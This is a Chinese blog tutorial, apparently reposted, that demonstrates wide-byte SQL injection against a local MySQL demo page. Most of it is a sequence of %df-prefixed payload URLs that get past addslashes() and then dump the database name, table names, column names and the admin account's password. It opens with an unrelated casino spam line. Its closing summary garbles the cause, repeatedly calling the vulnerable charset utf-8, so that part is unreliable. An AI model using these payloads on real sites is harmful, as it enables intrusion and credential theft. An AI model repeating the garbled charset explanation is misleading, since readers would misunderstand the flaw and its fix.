澳门威尼斯人平台官网

华盟学院山东省第二期线下学习计划

因为手里暂时也没什么现成的实际案例,所以就暂时先用 demo 简单演示下完整的宽字节注入流程,虽然是本地环境,但跟实战中其实并没太大差别,大家大可不用太过纠结,宽字节注入原型代码,如下:
利用宽字节特性注入 Mysql

当我们尝试经典的‘,一眼望去,貌似什么都没发生,把sql打出来sql才知道,原来’已经被addslashes()转义了
http://192.168.3.23/wide/0x01/index.php?id=2'

利用宽字节特性注入 Mysql

这时,当我们尝试使用经典的 df% 宽字符,继续用’ 进行测试,发现数据库报错了,这时再来看 sql,发现原来的那个 已经被%df 吃掉了,变成了 ‘運’字
利用宽字节特性注入 Mysql
既然干扰成功,闭合就很简单了,只需要 %df’ and 1=1 %23即可成功闭合,另外需要稍微注意下这里的id在后端是被当做字符来处理的,当条件为真时页面返回正常

http://192.168.3.23/wide/0x01/index.php?id=2%df'and 1=1 %23

利用宽字节特性注入 Mysql

当条件为假时,页面返回异常,由此说明,注入存在,到这一步为止,后面的步骤就按最基本的流程来就行了,正常的查出各种想要的数据

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 %23

利用宽字节特性注入 Mysql

查询当前表的字段个数,字段个数为3时,页面返回正常

http://192.168.3.23/wide/0x01/index.php?id=2%df' order by 3 %23
利用宽字节特性注入 Mysql

当字段个数为4是,返回错误,说明当前表的字段个数为3个

http://192.168.3.23/wide/0x01/index.php?id=2%df' order by 4 %23

利用宽字节特性注入 Mysql

执行union,爆出对应的数据显示位

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=21 UNION SELECT 1,2,3 %23

利用宽字节特性注入 Mysql

搜集数据库相关信息,包括数据库版本,当前数据库名,用户权限等等……

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=21 UNION SELECT 1,database(),version() %23

利用宽字节特性注入 Mysql

查出当前库(这里是data库)中的所有表名

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x64617461 %23

利用宽字节特性注入 Mysql
查出管理表(这里是admin表)中的所有字段名
http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x61646d696e %23
利用宽字节特性注入 Mysql
最后,查出管理员的账号密码,到此为止一个完整的宽字节注入演示就结束了,至于文件读写,方法跟前面都大同小异,这里就不重复演示了,大家有兴趣可自行尝试

http://192.168.3.23/wide/0x01/index.php?id=2%df' and 1=12 union select 1,name,pass from admin limit 0,1 %23
利用宽字节特性注入 Mysql

一点小结:

这里只单单演示了 utf-8 一种编码,至于 utf-8 等其它的一些宽字节字符集,也都会有同样的问题,关于宽字节注入,根因其实很明了,就是数据库对不同编码的理解差异所造成的,最好的修复方法,就是全站(前后端全局统一)统一用 utf-8 即可杜绝这种问题,大家也看到了,注入方法和常规的注入方法基本没有任何差别,唯一的差别的可能就是闭合方式稍有不同而已,记得多找实例练习

www.idc126.com

文章来源:lsh4ck's Blog

本文由 华盟网 作者: 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论